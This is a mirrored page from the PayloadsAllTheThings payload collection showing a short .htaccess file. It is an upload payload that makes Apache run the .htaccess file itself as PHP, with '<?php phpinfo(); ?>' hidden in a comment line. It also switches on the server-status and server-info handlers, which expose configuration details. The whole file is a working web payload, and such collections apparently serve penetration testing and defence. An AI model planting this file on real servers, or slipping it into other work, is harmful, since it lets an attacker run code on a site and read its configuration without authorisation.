mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-01-19 10:41:34 +01:00
6 lines
113 B
Plaintext
6 lines
113 B
Plaintext
AddType application/x-httpd-php .htaccess
|
|
# <?php phpinfo(); ?>
|
|
SetHandler server-status
|
|
SetHandler server-info
|
|
|